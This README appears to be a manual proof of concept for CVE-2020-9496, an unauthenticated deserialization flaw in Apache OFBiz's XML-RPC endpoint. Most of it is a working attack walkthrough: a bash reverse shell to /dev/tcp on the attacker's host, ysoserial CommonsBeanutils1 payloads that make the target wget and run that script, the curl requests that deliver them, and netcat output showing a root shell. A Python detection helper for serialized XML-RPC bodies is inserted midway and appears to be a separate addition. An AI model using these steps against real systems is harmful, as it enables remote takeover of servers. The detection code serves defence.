
CVE-2020-9496 PoC — Apache OFBiz Code Issue Vulnerability

Source
Associated Vulnerability
Title: Apache OFBiz Code Issue Vulnerability (CVE-2020-9496)
Description: XML-RPC requests are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
Description
CVE-2020-9496 manual exploit
Readme
# CVE-2020-9496 - RCE
Because the two xmlrpc-related requests in webtools (xmlrpc and ping) do not require authentication, they are vulnerable to unsafe deserialization. This issue was reported to the security team by Alvaro Munoz <pwntester@github.com> from the GitHub Security Lab team.

This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.

# Affected Version 17.12.01

# Fixed Versions 18.12.01, 17.12.04

Original Blog: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/

For this PoC to work we first drop a shell script on the target, then execute it; both steps are triggered with curl against the same endpoint.

### STEP 1: Create A Shell File With A Bash One-liner Containing Your IP Address & Port

```
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1
```
### STEP 2: Now We Need To Make This File Available via HTTP Service

```
$ sudo python3 -m http.server 80
```

### STEP 3: Generate Payload via ysoserial  - Change IP

```
$ ysoserial CommonsBeanutils1 "wget 10.10.x.x/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n"
```

### STEP 4: Copy The Output of Your Payload - Very Long String

```
rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==
```

### STEP 5: Use the below curl command to execute our payload. Paste the payload after `extensions">`
```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### Curl Command Without Payload For Your Reference

```
$ curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
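The reference request above is the shape a defender can key on: an XML-RPC call to an unauthenticated OFBiz endpoint carrying a `<serializable>` value in the Apache XML-RPC extensions namespace, whose base64 body decodes to a Java object stream (the `rO0AB` prefix is the base64 form of the Java stream magic `AC ED 00 05`). The following detection helper is an added example, not part of the original PoC or of OFBiz; the request bodies and the serialized bytes it checks are constructed samples, not working payloads.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"   # Java ObjectOutputStream header, base64 "rO0AB..."
WATCHED_PATHS = ("/webtools/control/xmlrpc", "/webtools/control/ping")


def inspect_xmlrpc_body(body: str) -> list:
    """One finding per <serializable> value in an XML-RPC body (empty list if not XML).

    ElementTree is used for brevity; feed untrusted bodies through defusedxml in
    production so entity-expansion tricks cannot stall the detector.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    method = root.findtext("methodName", default="")
    findings = []
    for elem in root.iter("{%s}serializable" % XMLRPC_EXT_NS):
        try:
            blob = base64.b64decode((elem.text or "").strip(), validate=True)
        except (binascii.Error, ValueError):
            blob = b""           # undecodable: still worth a look, but not proven Java
        findings.append({"method": method,
                         "java_serialized": blob.startswith(JAVA_STREAM_MAGIC),
                         "length": len(blob)})
    return findings


def classify_request(path: str, body: str) -> str:
    """'block' for a Java object stream on a watched path, 'review' for any other
    <serializable> element, 'allow' when the body carries none."""
    findings = inspect_xmlrpc_body(body)
    if not findings:
        return "allow"
    on_watched = path.split("?", 1)[0] in WATCHED_PATHS
    if on_watched and any(f["java_serialized"] for f in findings):
        return "block"
    return "review"


# Constructed samples (assumption: not real traffic). ATTACK_BODY mirrors the
# request shape shown on the page with a fake serialized object, not a gadget chain.
SAMPLE_BLOB = base64.b64encode(JAVA_STREAM_MAGIC + b"constructed-object-bytes").decode()
ATTACK_BODY = ('<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
               '<params><param><value><struct><member><name>test</name><value>'
               '<serializable xmlns="%s">%s</serializable></value></member></struct>'
               '</value></param></params></methodCall>' % (XMLRPC_EXT_NS, SAMPLE_BLOB))
BENIGN_BODY = ('<?xml version="1.0"?><methodCall><methodName>ping</methodName>'
               '<params><param><value><string>hello</string></value></param></params></methodCall>')
```

Run `classify_request(path, body)` over captured POST bodies for the two endpoints; a `block` verdict on a host still running an affected version is a strong indicator that this PoC or a variant was attempted.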

### Confirm That The HTTP Server Got A Hit After The Curl Command Ran

```
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.x.x - - [29/Apr/2021 12:57:07] "GET /shell.sh HTTP/1.1" 200 -
```
As you can see, we got a hit on our HTTP server: the file has been downloaded to the target's /tmp directory as shell.sh. Next, generate a second payload to execute that file, but start a netcat listener before you do.

### STEP 6: Start NetCat Listener

```
$ nc -lvnp 1337
listening on [any] 1337 ...
```

### STEP 7: Create Payload To Execute Previously Downloaded Shell Script

```
$ ysoserial CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n"
```
### STEP 8: Copy & Paste The Output Inside Curl Command & Execute It

```
curl https://127.0.0.1:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0..........................................................AAAACABQAEQAAAAoAAQACABYAEAAJcHQABFB3bnJwdwEAeHEAfgANeA==</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
```
### STEP 9: Check NetCat Listener For Reverse Connection

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.x.x] 60006
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
root@test:/usr/src/apache-ofbiz-17.12.01# id
id
uid=0(root) gid=0(root) groups=0(root)
```